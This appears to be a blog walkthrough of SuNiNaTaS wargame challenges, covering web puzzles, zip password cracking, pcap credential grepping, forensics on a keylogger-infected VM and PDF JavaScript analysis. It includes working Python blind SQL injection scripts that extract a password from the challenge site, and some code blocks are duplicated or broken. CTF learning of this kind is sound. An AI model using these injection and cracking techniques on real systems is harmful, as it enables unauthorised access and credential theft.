Posted onEdited onInctfViews: Disqus: Word count in article: 11kReading time ≈42 mins.
challenges
Game 01
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
<% str = Request("str")
If not str = "" Then result = Replace(str,"a","aad") result = Replace(result,"i","in") result1 = Mid(result,2,2) result2 = Mid(result,4,6) result = result1 & result2 Response.write result If result = "admin" Then pw = "????????" End if End if %>
ami
Game 02
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
<script> functionchk_form() { var id = document.web02.id.value; var pw = document.web02.pw.value; if (id == pw) { alert("You can't join! Try again"); document.web02.id.focus(); document.web02.id.value = ""; document.web02.pw.value = ""; } else { document.web02.submit(); } } </script> <!-- Hint : Join / id = pw --> <!-- M@de by 2theT0P -->
use browser network
id=admin&pw=admin
Game 03
1
http://suninatas.com/board/notice/write
1q2w3e4r5t6y7u8i9o0p
Game 04
1 2
<!-- Hint : Make your point to 50 & 'SuNiNaTaS' --> <!-- M@de by 2theT0P -->
❯ file Project1.exe Project1.exe: PE32 executable for MS Windows 4.00 (GUI), Intel i386, 8 sections
check the string CODE:0045041C 00000010 C Congratulation! CODE:00450434 0000000B C Authkey : CODE:004504B8 00000009 C 2abbe4b6 CODE:004504CC 00000009 C 44536ca0 CODE:004504E0 00000009 C 81aae922 CODE:004504F4 00000009 C e32fa0de
# suggest to use unar btw # auto check Korean ❯ unar web13.zip 압축비번은4자리정수
# translate is -> The compression password is a 4-digit integer
# john the ripper btw, seclist btw(all get from github) ❯ zip2john web13.zip > hash.txt ❯ john hash.txt --wordlist=~/ctf/tool/dic/SecLists/Fuzzing/4-digits-0000-9999.txt ... 7642 (web13.zip) ...
# unar again # open the 압축비번은4자리정수.txt with Encoding EUC-KR # i use vscode btw
4개의 이미지를 합하여 key를 구하시오 -> Combine the four images to find the key.
# what is pcap file? # Packet Capture # no need wireshark btw :)
# grep keyword like pass password etc, you will notice these post ❯ strings packet_dump.pcap | grep Hpw= Hid=suninatas&Hpw=suninatasc Hid=blackkey&Hpw=blackkeyn Hid=ultrashark&Hpw=sharkpass01~ Hid=ultrashark&Hpw=%3Dsharkpass01 Hid=ultrashark&Hpw=%3DSharkPass01
# try login with all of the four id pass Congratulation! Authkey : ********************************
WireSharkBetterThanWirelessShark
Game 17
1 2
convert qr.png -threshold 85% out.png convert out.png -background black -alpha remove -alpha off oo.png
i don't know how to use gimp
use krita btw, drag three patterns picture to krita over the
image
then scan use zbarimg
Good Job! Congraturation! AuthKey is YouAreQRCodeMaster~!
password = "" for i inrange(1, 31): found_char = False for char in charset: # substring(pw, index, length) payload = f"'and(substring(pw,{i},1)='{char}')--"
params = { 'id': 'admin' + payload, 'pw': 'a', }
try: target_url = f"{url}?id={params['id']}&pw={params['pw']}" r = requests.get(target_url, cookies=cookies) if"OK"in r.text: password += char print(f"[+] Found char at index {i}: {char}") found_char = True break except Exception as e: print(f"[!] Error: {e}")
ifnot found_char: print("[-] End of password or char not in charset.") break
print(f"\n[SUCCESS] Final Password: {password}")
1 2 3 4 5 6 7 8 9 10 11 12 13
[+] Found char at index 1: N [+] Found char at index 2: 1 [+] Found char at index 3: c [+] Found char at index 4: 3 [+] Found char at index 5: B [+] Found char at index 6: i [+] Found char at index 7: l [+] Found char at index 8: n [+] Found char at index 9: l [+] Found char at index 10: ) [+] Found char at index 11: + [+] Found char at index 12: + ...
try: # Note: Using params in requests.get handles URL encoding automatically response = requests.get(TARGET_URL, params=params, cookies=COOKIES, timeout=5) if ERROR_INDICATOR in response.text: print(f"\n[!] Error: {response.text}") exit() return SUCCESS_INDICATOR in response.text except requests.RequestException as e: print(f"\n[!] Request error: {e}") returnFalse
defmain(): print(f"[*] Starting Blind SQL Injection on {TARGET_URL}") print(f"[*] Target max length: {MAX_LENGTH}")
extracted_string = ""
for i inrange(1, MAX_LENGTH + 1): found = False # Visual progress for the current index sys.stdout.write(f"[*] Finding char {i:02}: ") sys.stdout.flush()
for char in CHARSET: if check_str(i, extracted_string + char): extracted_string += char sys.stdout.write(f"{char}\n") sys.stdout.flush() found = True break
try: # Note: Using params in requests.get handles URL encoding automatically response = requests.get(TARGET_URL, params=params, cookies=COOKIES, timeout=5) if ERROR_INDICATOR in response.text: print(f"\n[!] Error: {response.text}") exit() return SUCCESS_INDICATOR in response.text except requests.RequestException as e: print(f"\n[!] Request error: {e}") returnFalse
defmain(): print(f"[*] Starting Blind SQL Injection on {TARGET_URL}") print(f"[*] Target max length: {MAX_LENGTH}")
extracted_string = ""
for i inrange(1, MAX_LENGTH + 1): found = False # Visual progress for the current index sys.stdout.write(f"[*] Finding char {i:02}: ") sys.stdout.flush()
for char in CHARSET: # need reverse?? ############################################################################## if check_str(i, char + extracted_string): extracted_string += char sys.stdout.write(f"{char}\n") sys.stdout.flush() found = True break
i don't know why but it only work on my phone(just copy to phone browser), even if i change the pc browser UA
Auth_key = StARtANdr0idW0r1d
Game 25
1 2 3 4 5 6 7 8 9 10 11 12 13
❯ file Suninatas25 Suninatas25: Zip archive data, made by v2.0, extract using at least v2.0, last modified, last modified Sun, Aug 05 2019 10:34:20, uncompressed size 328936, method=deflate
❯ unar Suninatas25 Suninatas25: Zip "Suninatas25" already exists. (r)ename to "Suninatas25-1", (R)ename all, (o)verwrite, (O)verwrite all, (s)kip, (S)kip all, (q)uit? r class.dex (328936 B)... OK. Androidmanifest.xml (1732 B)... OK. resource.arsc (2600 B)... OK. Successfully extracted to "Suninatas25-1".
# like a apk, mv to suninatas25.apk, open with jadx
public String getContacts(String Sel) { StringBuffersb=newStringBuffer(); Cursorcontacts= getContentResolver().query(ContactsContract.Contacts.CONTENT_URI, null, null, null, null); while (contacts.moveToNext()) { StringdisplayName= contacts.getString(contacts.getColumnIndex("display_name")); StringcontactId= contacts.getString(contacts.getColumnIndex("_id")); if (displayName.equals("SuNiNaTaS")) { <-- Name need be SuNiNaTaS if(Sel.equals("sb")) { sb.append(displayName); } elseif (Sel.equals("id")) { sb.append(contactId); } } } return sb.toString(); } ///// }
1 2 3 4 5
http://www.suninatas.com/challenge/web25/chk_key.asp?id=arstarst&pw=arstarst&Name=SuNiNaTaS&Number=?? <- click make botton to get the number, use test account btw
Congratulations! auth_key is ************************
FanTast1c aNdr0id w0r1d!
Game 26
1 2 3 4 5 6 7 8 9
This challenge is to recover the plaintext from the following ciphertext using frequency analysis:
Note that we have omitted the blank letters and punctuation marks of the plaintext.
# random substitution cipher
# Frequency analysis is a technique that measures how often specific items—such as letters in cryptography, words in text, or components in a signal—occur within a dataset. It relies on statistical patterns, such as the high frequency of 'E' in English text, to break ciphers, analyze data, or identify vibration, noise, and structural resonance in engineering.
$ echo"$CIPHER" | fold -w1 | sort | uniq -c | sort -nr 92 n 78 z 69 g 65 c 65 b 62 v 60 i 59 y 58 p 31 x 30 q 27 a 26 h 25 f 22 m 20 o 19 d 14 s 9 k 7 j 5 e 4 t 3 r 2 u 1 l
kim yuna is a south korean figure skater she is the olympic champion in ladies singles the world champion the four continents champion a three time grand prix final champion the world junior champion the junior grand prix final champion and a four time south korean national champion kim is the first south korean figure skater to win a medal at an isu junior or senior grand prix event is u championship and the olympic games she is the first female skater to win the olympic games the world championships the four continents championships and the grand prix finals he is one of the most highly recognized athletes and media figures in south korea as of april this year she is ranked second in the world by the international skating union she is the current record holder for ladies in the short program the free skating and the combined total under the isu judging systems he is also the first female skater to surpass the two hu dread point mark under the isu judging systems he has never been placed off the podium in her entire career
kimyuna
Game 27
1 2 3
NSA has intercepted a chatter between mafia organization members from an IRC server. investigators are certain that the message has some secret, however they can't find any clue. your mission is to help the NSA investigators and reveal the secret of this message.
Pruss is my name. I am a member of russian mafia group. we
communacate via a secure channel with secure password like.. \(A\)"4kruss password has to be long and it
should contain alphabet, number, etc. I added 'russ' at the end because
my name is Pruss. and this is our password convention. we must add
'russ' to end.. because it is our code name and we are very bad russian.
we use secure communication since FBI monitors our communications on the
Internet. we can't use password like DDDDDHHHHHHPDDDDDruss. because
these passwords can be easily broken by FBI hackers. even if the
password is long enough,(something like @@@@@@@@@@@@@@@@@@@@russ) it is not secure
because there is only one repeated character '@'. anyway, using secure
password is important... Pruss is actually not only my name, it is also
code name of our mafia. we use similar names. one of my friend's name is
Druss. Druss is my best friend and a professional killer. but he is not
good at security. one day Druss used a password DDDDruss I told him this
is very bad and weak password. the FBI will break it very easily. so he
changed his password into HHHHHHHHHHHHHHHHHHHHHHHHHHruss. I told him
even if password is long, it is weak if there is no combination with
number and symbol... he said 'ok Pruss, this time I'll make a very long
and secure password which contains number and symbol as well!' and he
made '11111DDDDD@@@@@@@@@@PDDDDD@@@@@@@@@@PDDDDDHHHHHHHHHHHHHHHHHHHHruss'!!
and asked me if this is secure enough. I told him it is secure, but it
is long to remember. he said 'thank you Pruss you always teach me
computer security' anyway this was small talk and I will tell you
something about mafia life. Druss likes to listen to music, such as
rock, pop and jazz... even though he is a tough killer he has sensitive
heart.. Druss likes to dressed up with very black jacket with black
jean, he thinks it is a cool fashion, but I don't like it.. Druss has
high IQ, he is a member of group called MENSA(group of people who has IQ
over 150) so, he is very very smart. Druss has a girl friend, her name
is Hruss. Hruss is also my friend too. she is very very pretty, and also
a killer(!). Druss likes Hruss a lot, they are in love with each other.
it is common case that mafia members hooks up together. mafia@russia.ru
is our server. we have lot of data regarding our crimes in our server so
FBI hackers are trying to hack mafia@russia.ru but we don't have to
worry since we are using secure password(we discussed this) as I told
earlier. anyway.. Pruss sounds somewhat like 'Press' so, Press is my
nick name it is somewhat juvenile but I think it is pretty funny too
Druss always makes fun of me by using my nick name 'Press' sometimes I
got angry but I don't express my feeling because Druss is a professional
killer I don't want to get shot. it is possible to get shot by mafia
friends. it happened once. Druss shot a friend many years ago, he was
also a mafia member. they had a quarrel and it turned into very big
fight so Druss shot other friend... after that incident, I always say
something nicely to him. in fact the secure password which Druss have
created earlier I felt it was very stupid password. however I told him
very nicely. who makes password like '@@PDDDDDPDDDDDHPDDDDD@@@@@PDDDDDPDDDDD@@@PDDDDDruss'? no body
will ever think that this is a password. to me, a secure password will
be say something like... kNz3i!Bs4jP
defhook_mem_write(uc, access, address, size, value, user_data): """ Monitor memory writes to catch PUSH instructions. In many CTF challenges, characters are pushed onto the stack one by one. """ if access == UC_MEM_WRITE: try: char = chr(value) if char.isprintable(): flag_chars.append(char) print(f"[!] Stack Push: '{char}' (0x{value:02x})") except Exception: pass
defmain(): # Load the shellcode/binary try: withopen(CODE_FILE, 'rb') as f: code = f.read() except FileNotFoundError: print(f"Error: {CODE_FILE} not found.") sys.exit(1)
print(f"Emulating x86 code ({len(code)} bytes)...")
try: # Initialize emulator in x86 32-bit mode mu = Uc(UC_ARCH_X86, UC_MODE_32)
# Map memory for code and stack mu.mem_map(BASE_ADDRESS, MEM_SIZE) mu.mem_map(STACK_ADDRESS, MEM_SIZE)
# Write code to memory mu.mem_write(BASE_ADDRESS, code)
# Initialize registers mu.reg_write(UC_X86_REG_EAX, 0x0) # Set stack pointer to the middle of the mapped stack region mu.reg_write(UC_X86_REG_ESP, STACK_ADDRESS + (MEM_SIZE // 2))
# Execute the code mu.emu_start(BASE_ADDRESS, BASE_ADDRESS + len(code))
except UcError as e: # Emulation often ends with an error when shellcode runs off the end # or lacks a proper exit syscall, which is expected. print(f"\nEmulation stopped: {e}")
# Output the results if flag_chars: print("\n" + "="*20) print(f"Extracted Flag: {''.join(flag_chars)}") print("="*20) else: print("\nNo printable characters captured from stack writes.")
❯ file So_Simple.zip So_Simple.zip: Zip archive data, made by v2.0, extract using at least v2.0, last modified, last modified Sun, Oct 21 2013 15:07:58, uncompressed size 205, method=deflate
❯ unar So_Simple.zip So_Simple.zip: Zip Am_I_key.zip (205 B)... OK. Am_I_key2.txt (4335 B)... OK. Am_I_key3.txt (1445 B)... OK. Successfully extracted to "So_Simple".
~/Downloads ❯ y
~/Downloads/So_Simple ❯ unar Am_I_key.zip Am_I_key.zip: Zip There_is_key.txt (61 B)... OK. Successfully extracted to "./There_is_key.txt".
# cat Isn't it so easy? Take it. dGE1dHlfSDR6M2xudXRfY29mZmVl # from base64
ta5ty_H4z3lnut_coffee
or use radare2, press V and i to change the hex value 0x0908 to
0x0008
Joon-hyeok asked Seong-joon to repair PC After repairing, Seong-joon did something to PC You should fix this PC.
Q1 : When you surf "www.naver.com", Web browser shows something wrong. Fix it and you can find a Key Q2 : Installed Keylogger's location & filename(All character is lower case) - ex) c:\windows\notepad.exe Q3 : Download time of Keylogger - ex) 2016-05-27_22:00:00 (yyyy-mm-dd_hh:mm:ss) Q4 : What did Keylogger detect and save? There is a Key
Auth Key = lowercase(MD5(Key of Q1+Answer of Q2+Answer of Q3+Key of Q4))
❯ file 'Windows7(SuNiNaTaS)' Windows7(SuNiNaTaS): EGG archive data, version 1.0
EGG file (.egg) is a compressed archive file format developed by
ESTsoft primarily for their ALZip software, commonly used in South
Korea. It acts similar to a .ZIP file but offers superior Unicode
support and efficient compression, frequently used for distributing
large files,, and supports split volumes.
~/Downloads/Windows7(SuNiNaTaS) ❯ la total 8.0G drwxr-xr-x 1 kita kita 28 Feb 15 14:08 caches/ -rw-r--r-- 1 kita kita 2.0M May 24 2016 vmware-0.log -rw-r--r-- 1 kita kita 384K May 24 2016 vmware.log -rw-r--r-- 1 kita kita 53M May 24 2016 'Windows 7-000001.vmdk' -rw-r--r-- 1 kita kita 8.5K May 24 2016 'Windows 7.nvram' -rw-r--r-- 1 kita kita 1.0G May 24 2016 'Windows 7-Snapshot2.vmem' -rw-r--r-- 1 kita kita 2.1M May 24 2016 'Windows 7-Snapshot2.vmsn' -rw-r--r-- 1 kita kita 6.9G May 24 2016 'Windows 7.vmdk' -rw-r--r-- 1 kita kita 445 May 24 2016 'Windows 7.vmsd' -rw-r--r-- 1 kita kita 3.2K May 24 2016 'Windows 7.vmx' -rw-r--r-- 1 kita kita 4.6K May 24 2016 'Windows 7.vmxf'
~/Downloads/Windows7(SuNiNaTaS) took 30s ❯ sudo guestmount -a "Windows 7.vmdk" -m /dev/sda1 --ro /mnt/win
❯ sudocat /mnt/win/Windows/System32/drivers/etc/hosts [sudo] password for kita: # Copyright (c) 1993-2009 Microsoft Corp. # # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # # For example: # # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host 121.189.57.82 naver.com 121.189.57.82 www.naver.com # # # C0ngr4tur4ti0ns!! This is a Keeeeeeeeeeey : what_the_he11_1s_keey # # # localhost name resolution is handled within DNS itself. # 127.0.0.1 localhost # ::1 localhost
# get wrong time, need time of Birth [root@kita233 v196vv8]# stat v1tvr0.exe File: v1tvr0.exe Size: 1594368 Blocks: 3120 IO Block: 4096 regular file Device: 0,81 Inode: 109 Links: 1 Access: (0777/-rwxrwxrwx) Uid: ( 0/ root) Gid: ( 0/ root) Access: 2016-05-24 03:26:09.330498800 +0800 Modify: 2010-07-07 06:50:09.109375000 +0800 Change: 2016-05-24 03:26:09.361698900 +0800 Birth: -
# get MFT (Master File Table), same wrong time ❯ vol -f 'Windows 7-Snapshot2.vmem' -s ./volsym windows.mftscan.MFTScan | grep -i "v1tvr0.exe" * 0xe8b38b0100.0FILE 50282 1DB scanFile finArchive FILE_NAME 2016-05-23 19:26:09.000000 UTC 2016-05-23 19:26:09.000000 UTC 2016-05-23 19:26:09.000000 UTC 2016-05-23 19:26:09.000000 UTC v1tvr0.exe
# need to check browser download history # notice user use ie browser, and ie browser store info in index.dat [root@kita233 win]# find . -name "index.dat" -exec strings -f {} \; | grep -i "exe" ... ./Users/training/AppData/Local/Microsoft/Windows/History/History.IE5/index.dat: Visited: training@http://192.168.163.1/files/pc-spy-2010-keylogger-surveillance-spy-3.exe <- notice spy keylogger ...
URL Visited: training@http://192.168.163.1/files/pc-spy-2010-keylogger-surveillance-spy-3.exe 05/24/2016 03:25:06 05/24/2016 03:25:06 # need to change time zone to UTC +9, now is UTC +8 2016-05-24_04:25:06
Q4:键盘记录器检测并保存了什么?有一把钥匙
# ���� 4:37:57 How did you know pAsS\orD? Wow... Kee22 ls "blackkey is a Good man" # blackkey is a Good man
Auth Key = 小写(MD5(Q1的密钥+Q2的答案+Q3的答案+Q4的密钥))
what_the_he11_1s_keeyc:\v196vv8\v1tvr0.exe2016-05-24_04:25:06blackkey is a Good man
use cyberchef btw md5
970f891e3667fce147b222cc9a8699d4
Game 30
one of the most interesting game, be sure to try it first.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
General Kim's PC was hacked by Hacker Here is a Memory Dump at that time, You should find what Hacker did
Q1 : IP Address of General Kim's PC Q2 : Which secret document did Haker read? Q3 : What is content of secret document? There is a "Key"
Auth Key = lowercase(MD5(Answer of Q1+Answer of Q2+Key of Q3))
❯ pdf-parser -h Options: -s SEARCH, --search=SEARCH string to search in indirect objects (except streams) -f, --filter pass stream object through filters (FlateDecode, ASCIIHexDecode, ASCII85Decode, LZWDecode and RunLengthDecode only) -o OBJECT, --object=OBJECT id(s) of indirect object(s) to select, use comma (,) to separate ids (version independent) -w, --raw raw output for data and filters ...
❯ pdf-parser -s JavaScript Hello_SuNiNaTaS.pdf This program has not been tested with this version of Python (3.14.2) Should you encounter problems, please use Python version 3.12.2 obj 30 0 Type: Referencing: 31 0 R, 38 0 R
<< /JavaScript 31 0 R <- /EmbeddedFiles 38 0 R <- not scan in pdfid, but exist in pdf-parser, this is a nest object >>
obj 36 0 Type: Referencing:
❯ pdf-parser -o 38 Hello_SuNiNaTaS.pdf This program has not been tested with this version of Python (3.14.2) Should you encounter problems, please use Python version 3.12.2 obj 38 0 Type: Referencing: 40 0 R
❯ pdf-parser -o 39 -f -d nested.pdf Hello_SuNiNaTaS.pdf This program has not been tested with this version of Python (3.14.2) Should you encounter problems, please use Python version 3.12.2 obj 39 0 Type: Referencing: Contains stream <-
❯ pdf-parser -s js decrypted.pdf This program has not been tested with this version of Python (3.14.2) Should you encounter problems, please use Python version 3.12.2 obj 2 0 Type: /Action Referencing: 4 0 R
<< /JS 4 0 R <- Object 4 is a stream object /S /JavaScript /Type /Action >>
❯ pdf-parser -o 4 decrypted.pdf This program has not been tested with this version of Python (3.14.2) Should you encounter problems, please use Python version 3.12.2 obj 4 0 Type: Referencing: Contains stream
<< /Filter /FlateDecode /Length 45 >>
❯ pdf-parser -o 4 -f -d dump decrypted.pdf
❯ cat dump "HERE IS FLAGS *********************"⏎ # omg flag is here, don't forget to md5 it
~/Downloads ❯ pdf-parser -o 35 -f -w Hello_SuNiNaTaS.pdf This program has not been tested with this version of Python (3.14.2) Should you encounter problems, please use Python version 3.12.2 obj 35 0 Type: Referencing: 36 0 R, 37 0 R <</S 36 0 R/JS 37 0 R>>
<< /S 36 0 R /JS 37 0 R >>
<</S 36 0 R/JS 37 0 R>>
~/Downloads ❯ pdf-parser -o 37 -f -w Hello_SuNiNaTaS.pdf This program has not been tested with this version of Python (3.14.2) Should you encounter problems, please use Python version 3.12.2 obj 37 0 Type: Referencing: 1 4 R Contains stream
You got a USB image of terrorist from the National Police Agency. A beginner made a USB image wrong, So your PC couldn't recognize it.
You should fix a USB image and prevent next terror. Q1 : What is modified date/time of the file which contains next terror plan. (UTC+9) Q2 : Where is the next terror target.
# use sleuthkit to check the file system type ❯ fsstat -f fat32 usb Invalid magic value (Error: sector size (4352) is not a multiple of device size (512) Do you have a disk image instead of a partition image?)
An HWP file (Hangul Word Processor) is a proprietary document format
developed by Hancom Inc. used primarily in South Korea. It is the
standard word processing format for Korean government, academic, and
business documents, akin to Microsoft Word’s .docx but designed for the
Hangul script.
Opening
HWP and HWPX files requires special file readers capable of handling
these formats. Due to their specificity, few Word editors are capable of
doing so. Among them, there are accessible solutions such as ONLYOFFICE
Desktop Editors — with its latest version 8.3, working with these files
has become easier.